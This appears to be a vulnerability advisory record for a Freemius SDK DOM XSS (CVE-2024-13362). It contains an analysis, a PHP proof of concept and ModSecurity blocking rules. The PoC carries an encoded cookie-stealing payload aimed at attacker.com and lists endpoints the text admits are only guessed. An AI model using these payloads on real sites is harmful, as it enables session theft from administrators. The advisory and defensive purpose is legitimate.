```json
{
"analysis": "Atomic Edge analysis of CVE-2024-13362 (metadata-based): Multiple WordPress plugins and themes using a Freemius connector up to version 2.10.1 are vulnerable to reflected DOM-based cross-site scripting via the 'url' parameter. The vulnerability carries a CVSS score of 6.1 (Medium), with vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. The affected plugin identified in the metadata is FooGallery (slug: foogallery) at version 2.4.27, with patched version 2.4.29.\nRoot Cause: The CWE-79 classification and description indicate improper neutralization of input during web page generation. This is a reflected DOM-based XSS vulnerability. Atomic Edge research infers that the vulnerable code likely exists in a JavaScript file bundled by the Freemius SDK that handles the 'url' parameter from the query string. The Freemius SDK often includes JavaScript that reads URL parameters and uses them in DOM manipulation without proper output escaping. Since no source code diff is available, this is an inference based on the CWE and on the description mentioning the 'url' parameter specifically. The vulnerability does not require authentication (PR:N): the attacker needs no privileges on the site, and any visitor can be targeted.\nExploitation: An unauthenticated attacker crafts a malicious link containing a JavaScript payload in the 'url' parameter. The target URL points to an endpoint on a site running the vulnerable FooGallery plugin with the Freemius connector. Atomic Edge analysis suggests the vulnerable endpoint is likely the Freemius connector's UI JavaScript file or dashboard page that reads window.location or URL parameters. The attacker sends the crafted link to a logged-in administrator or editor. If the victim opens the link while authenticated, the injected script executes in the context of the victim's session. User interaction is required (UI:R): the victim must click the malicious link. The script can perform actions such as stealing session cookies, modifying page content, or performing actions on behalf of the victim.\nRemediation: The fix likely requires proper output escaping when the 'url' parameter value is written to the DOM. Based on the CWE, developers should use the escaping function appropriate to the context in which the parameter is used: for a JavaScript context, JavaScript string escaping or encoding functions; for an HTML context, HTML entity encoding. The Freemius SDK should validate the 'url' parameter against a whitelist of allowed origins or URL patterns before using it. Atomic Edge analysis recommends that the Freemius team implement server-side redirect validation that only permits redirects to trusted domains, and ensure that client-side JavaScript escapes or sanitizes the parameter before DOM insertion.\nImpact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser within the context of the vulnerable WordPress site. The CVSS impact values indicate low confidentiality and low integrity impact (C:L/I:L). An attacker could steal session tokens, perform actions on behalf of the victim (such as changing plugin settings or creating rogue admin users), or redirect users to malicious sites. Since the attack requires user interaction and the impact is limited to reflected XSS (not stored XSS), the severity is medium. However, if a site administrator is tricked, the attacker could gain administrative access to the WordPress installation.",
"poc_php": "// Atomic Edge CVE Research – Proof of Concept (metadata-based)\n// CVE-2024-13362 – Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter\n\n// This PoC demonstrates how an attacker would craft a malicious URL that triggers XSS\n// when visited by a victim. The exact endpoint depends on the Freemius connector implementation.\n// Based on Atomic Edge analysis, the most likely entry point is the Freemius SDK's\n// JavaScript-based redirect handler or account activation page.\n\n// Configurable target URL – change this to the vulnerable WordPress site\n$target_url = 'http://example.com'; // Replace with actual target URL\n\n// The vulnerable parameter is 'url' – it is likely read client-side by Freemius JavaScript\n// that performs window.location manipulation or DOM updates without escaping.\n// Common vulnerable paths include:\n// – /wp-admin/admin.php?page=freemius-account&url=javascript:alert(1)\n// – /wp-admin/admin-ajax.php?action=freemius_redirect&url=javascript:alert(1)\n// – Direct link to Freemius SDK JS file that reads URL parameters\n\n// Craft the malicious URL with XSS payload\n// We use a common DOM-based XSS payload that executes when the 'url' parameter is written to the DOM\n$xss_payload = 'javascript:alert(document.cookie)';\n// Or use a more stealthy payload that exfiltrates data\n$xss_payload = 'data:text/html;base64,PHNjcmlwdD5mZXRjaCgnaHR0cHM6Ly9hdHRhY2tlci5jb20vY29va2llPycgKyBkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+';\n\n// Build the exploit URL\n// Based on Freemius common patterns, try the dashboard page first\n$exploit_url = $target_url . '/wp-admin/admin.php?page=freemius&url=' . urlencode($xss_payload);\n\necho \"[+] Atomic Edge Research – CVE-2024-13362 PoC\\n\";\necho \"[+] Vulnerable: Freemius SDK <= 2.10.1 (FooGallery <= 2.4.27)\\n\";\necho \"[+] Target: $target_url\\n\\n\";\necho \"[+] Crafted Exploit URL:\\n\";\necho $exploit_url . \"\\n\\n\";\necho \"[+] To test: Send this URL to an authenticated admin user.\\n\";\necho \"[+] If the XSS triggers, an alert box with cookies will appear (for the simple payload)\\n\";\necho \"[+] or the cookie will be sent to the attacker's server (for the exfiltration payload).\\n\\n\";\necho \"[+] Alternate endpoints to try if the above doesn't work:\\n\";\necho $target_url . \"/wp-admin/admin.php?page=freemius-account&url=\" . urlencode($xss_payload) . \"\\n\";\necho $target_url . \"/wp-admin/admin-ajax.php?action=freemius_connect_url&url=\" . urlencode($xss_payload) . \"\\n\";\n\n// Note: This PoC does not verify if the target is vulnerable; it only generates the exploit URL.\n// A real attacker would use a web browser to perform the click and observe the XSS execution.\n// The exact endpoint should be confirmed by examining the Freemius SDK JavaScript files.\n",
"modsecurity_rule": "# Atomic Edge WAF Rule – CVE-2024-13362 (metadata-based)\n# Blocks reflected DOM-based XSS via the 'url' parameter in Freemius endpoints\n# This rule targets the most common Freemius connector pages and AJAX handlers\n# REQUEST_FILENAME is matched rather than REQUEST_URI because REQUEST_URI includes the query string,\n# which would prevent the anchored path patterns below from ever matching a request that carries url=\n# t:urlDecode runs before t:lowercase so that percent-encoded upper-case letters are normalised before matching\n\n# Rule 1: Block XSS payloads in url parameter on Freemius admin pages\nSecRule REQUEST_FILENAME \"@rx ^/wp-admin/admin\\.php$\" \\\n \"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius DOM XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'\"\n SecRule QUERY_STRING \"@rx (?:^|&)url=(?:javascript|data|vbscript|onerror|onload|onclick|onmouseover|alert\\()\" \"t:urlDecode,t:lowercase,chain\"\n SecRule ARGS:page \"@rx ^freemius\" \"t:lowercase\"\n\n# Rule 2: Block XSS payloads in url parameter on Freemius AJAX handlers\nSecRule REQUEST_FILENAME \"@streq /wp-admin/admin-ajax.php\" \\\n \"id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius AJAX DOM XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'\"\n SecRule ARGS:action \"@rx ^freemius_\" \"t:lowercase,chain\"\n SecRule ARGS:url \"@rx (?:javascript|data|vbscript|onerror|onload|onclick|onmouseover|alert\\()\" \"t:urlDecode,t:lowercase\"\n\n# Rule 3: Block direct access to Freemius JS files with XSS payloads in url\nSecRule REQUEST_FILENAME \"@rx ^/wp-content/plugins/[^/]+/freemius/.*\\.js$\" \\\n \"id:20261996,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius JS file XSS via url',severity:'CRITICAL',tag:'CVE-2024-13362'\"\n SecRule QUERY_STRING \"@rx (?:^|&)url=(?:javascript|data|vbscript|onerror|onload|onclick|onmouseover|alert\\()\" \"t:urlDecode,t:lowercase\""
}
```